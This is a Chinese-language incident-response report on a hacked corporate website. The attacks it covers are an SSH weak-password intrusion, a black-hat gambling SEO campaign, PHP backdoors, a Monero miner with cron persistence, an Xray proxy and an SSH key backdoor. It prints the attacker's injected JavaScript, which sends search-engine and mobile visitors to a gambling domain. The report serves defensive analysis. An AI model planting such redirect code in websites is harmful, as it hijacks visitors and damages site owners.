0x01 事件背景

8月某日，客戶官網(wǎng)被黑，需在特定時間內(nèi)完成整改。為避免客戶業(yè)務(wù)受到影響，實驗室相關(guān)人員第一時間展開本次攻擊事件的應(yīng)急處理。

0x02 事件分析

網(wǎng)站源碼被篡改，攻擊者一定獲取到了權(quán)限，那么接下來的思路就是推測攻擊者入侵手段，找到業(yè)務(wù)脆弱點，對服務(wù)器進(jìn)行全方位排查，找到攻擊者留下來的痕跡并進(jìn)行分析處理。

2.1 信息收集

與客戶簡單溝通后，得知如下基本信息：

• 官網(wǎng)服務(wù)器為租賃的阿里云虛擬專用服務(wù)器
• 虛擬專用服務(wù)器上部署的官網(wǎng)后臺使用了DedeCMS織夢系統(tǒng)
• 虛擬專用服務(wù)器安裝了寶塔面板服務(wù)器運(yùn)維系統(tǒng)
• 虛擬專用服務(wù)器安裝的寶塔面板的密碼已被篡改

2.2 攻擊入口判斷

服務(wù)器開放了SSH、寶塔、DedeCMS等3個服務(wù)，那么接下來我們從服務(wù)器開放的服務(wù)來推測可能的攻擊入口。

玩過寶塔的朋友都知道，寶塔后臺路徑未知的情況下，通過寶塔后臺GetShell基本上是不可能的。此外，客戶設(shè)置的BT面板的用戶名也有些復(fù)雜，所以推斷攻擊者從寶塔下手的可能性很?。ㄟ@里埋個坑，前面提到客戶寶塔后臺密碼被修改的情況，后面會說到原因）。

客戶官網(wǎng)使用的DedeCMS版本為 v5.7 sp2，嘗試所有公開漏洞均未成功。并且，DedeCMS的后臺密碼沒有規(guī)律，所以推測從DedeCMS入侵的可能性也不是很大。

客戶給出了服務(wù)器的賬號密碼，我們的第一反應(yīng)是入侵從SSH弱口令開始的。因為我的爆破字典里包含了服務(wù)器的密碼（手動笑哭），但這顯然還不能直接讓客戶信服。

綜上，高度懷疑服務(wù)器是被爆破SSH弱口令后導(dǎo)致了后續(xù)的入侵行為。

2.3 應(yīng)急響應(yīng)

在判斷攻擊入口后，我們登錄客戶的服務(wù)器，仔細(xì)掄了一遍，只能說服務(wù)器上的東西有點多。。。

2.3.1 BC黑頁&PHP后門

首先訪問客戶首頁，發(fā)現(xiàn)官網(wǎng)頁面表面沒有任何異常，也并未被重定向到BC網(wǎng)站。但是實際上網(wǎng)頁Meta信息被篡改，且會異步請求BC網(wǎng)站和百度統(tǒng)計的若干接口。

推測攻擊者的目的應(yīng)為BC網(wǎng)站SEO優(yōu)化，提高網(wǎng)站的SEO排名。

定位到服務(wù)器上的DedeCMS網(wǎng)站源碼，發(fā)現(xiàn)源碼在7月17日被修改植入了惡意代碼。

網(wǎng)站源碼被插入2個新的meta元素，以及一段JavaScript代碼。下圖為新增的meta元素，解碼后發(fā)現(xiàn)是菠菜搜索關(guān)鍵詞。

新插入的JavaScript代碼如下圖所示。解碼后發(fā)現(xiàn)是一段引用外部js的代碼。

惡意js文件的內(nèi)容為：

此文件的作用就是插入https://sjbgw2022.com/tb.js的惡意文件以及對惡意SEO優(yōu)化。

繼續(xù)查看tb.js這個文件內(nèi)容：

//這里省略一大段代碼，因為代碼內(nèi)容與ly.js內(nèi)容一致都是對惡意SEO的優(yōu)化
//上面的代碼與之前一樣作用就是推送自動收錄。
//JS正則表達(dá)式判斷來路，如果是下列搜索引擎則指定跳轉(zhuǎn)網(wǎng)址。
var regexp=/\.(sogou|soso|baidu|bsb|youdao|lanjie|bing|118114|biso|sm|qq|so|safe|toutiao|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="https://tb04.cc/";//滿足就跳轉(zhuǎn)至菠菜頁面。
}

//更詳細(xì)的檢測，判斷是否包含搜索引擎字段，是則跳轉(zhuǎn)至菠菜頁面。
 var sp_regexps =
  /\.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)\./gi;
var sp_whereis = window.location.referrer;
try {
  sp_whereis = top.document.referrer;
} catch (e) {}
try {
  sp_whereis = window.parent.document.referrer;
} catch (e) {}
var sp_domains = window.location.host;
try {
  sp_domains = top.document.domain;
} catch (e) {}
try {
  sp_domains = window.parent.document.domain;
} catch (e) {}
if (sp_regexps.test(sp_whereis)) {
  window.location.href = 'https://tb04.cc';
  parent.window.opener.location = 'https://tb04.cc';
}

//判斷是否是移動端，滿足也跳轉(zhuǎn)至菠菜頁面。
function browserRedirect() {
  var sUserAgent = navigator.userAgent.toLowerCase();
  var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';
  var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';
  var bIsMidp = sUserAgent.match(/midp/i) == 'midp';
  var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';
  var bIsAndroid = sUserAgent.match(/android/i) == 'android';
  var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';
  var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';
  if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {
  } else {
    window.location.href = 'https://tb04.cc';
  }
}
browserRedirect();

發(fā)現(xiàn)這個文件的作用是惡意SEO優(yōu)化，判斷訪問網(wǎng)站的來路，如果是從搜索引擎過來的就會跳轉(zhuǎn)至菠菜頁面，如果是直接訪問官網(wǎng)則不會有變化。菠菜頁面截圖如下所示：

此外，在DedeCMS源碼目錄發(fā)現(xiàn)了很多PHP后門。

2.3.2 寶塔淪陷

接下來我們進(jìn)行了日志排查，發(fā)現(xiàn)系統(tǒng)日志都已經(jīng)被清理。

前面說到寶塔密碼已被修改，那么為了登入寶塔，我們直接修改寶塔密碼。在服務(wù)器上輸入bt命令進(jìn)行修改。

登入寶塔后臺后，我們發(fā)現(xiàn)最后一次登錄時間為7月16日，攻擊者上傳了一個名為zxc.php的木馬文件。

網(wǎng)站日志未被刪除，日志顯示攻擊者在7月17日通過zxc.php上傳大量后門文件，下圖為日志訪問記錄截圖。

下圖為一個PHP大馬的截圖。

綜上所述，推斷攻擊者是菠菜SEO黑產(chǎn)組織，攻擊手法為利用SSH弱口令遠(yuǎn)程登錄服務(wù)器，修改寶塔后臺密碼后上傳木馬，進(jìn)而通過代理機(jī)器繼續(xù)上傳其它木馬文件。這是2.2節(jié)中所述的寶塔密碼被篡改的原因。

2.3.3 門羅幣挖礦木馬

服務(wù)器上的問題還不僅僅是被掛黑頁這么簡單。服務(wù)器進(jìn)程排查過程中發(fā)現(xiàn)，某進(jìn)程CPU占用率特別高，不出意外就是挖礦程序了。

跟蹤定位文件位置為/root/.warmup/。

發(fā)現(xiàn)挖礦配置文件/root/.warmup/config.json。

從網(wǎng)絡(luò)通聯(lián)信息發(fā)現(xiàn)礦池地址為5.133.65.53至5.133.65.56的IP段。威脅情報表明這是一個門羅幣礦池。

殺死挖礦進(jìn)程后程序自啟動，刪除挖礦文件后發(fā)現(xiàn)過一段時間文件會被重新下載并運(yùn)行。這說明存在挖礦守護(hù)進(jìn)程或定時任務(wù)。經(jīng)分析，發(fā)現(xiàn)一個5月7日就創(chuàng)建的定時挖礦任務(wù)。

somescript文件內(nèi)容為創(chuàng)建一個挖礦自啟動服務(wù)warmup，保證進(jìn)程或文件被刪除后能重新加載挖礦程序。

2.3.4 xray代理

Xray是V2ray的一個分支(Fork)。Xray項目基于V2ray而來，其支持并且兼容V2ray的配置，其官方網(wǎng)站為（https://xtls.github.io/Xray-docs-next/），我們在進(jìn)程排查中發(fā)現(xiàn)有Xray程序正在運(yùn)行。

Xray最后一次運(yùn)行時間為8月17日。

2.3.5 SSH后門

最后，除了后門、定時任務(wù)外，繼續(xù)查看服務(wù)器上是否有攻擊者留下的手段。我們發(fā)現(xiàn)服務(wù)器在5月9日被寫入SSH公鑰，經(jīng)與客戶確認(rèn)不是客戶所為。

0x03  應(yīng)急處理

客戶有業(yè)務(wù)數(shù)據(jù)備份，那么處理和加固就簡單多了。我們對服務(wù)器進(jìn)行了如下操作：

• 重置系統(tǒng)服務(wù)器
• 修改服務(wù)器、系統(tǒng)后臺的口令，加強(qiáng)口令復(fù)雜度，避免出現(xiàn)連續(xù)性口令
• 自定義日志目錄，避免日志被刪除
• 網(wǎng)站目錄設(shè)置除root外所有用戶禁止寫入
• 上傳目錄做權(quán)限設(shè)置

0x04  事件還原與總結(jié)

我們推測攻擊者不止一個，并且都是通過SSH弱口令入侵服務(wù)器。事件時間線如下圖所示：

第一波攻擊者可能是挖礦組織，在5月7日大概率利用SSH弱口令進(jìn)入服務(wù)器上傳挖礦程序somescript，且做了對應(yīng)的維持手段。

第二波攻擊者可能是黑產(chǎn)組織，攻擊時間為7月16日至7月17日，其操作是對網(wǎng)站做黑帽SEO，更改寶塔后臺并上傳大量后門。

第三波攻擊者應(yīng)該只是想控制一批跳板機(jī)，在8月17日上傳了代理程序，目前在服務(wù)器上出現(xiàn)的惡意事件最后截止也是到8月17日。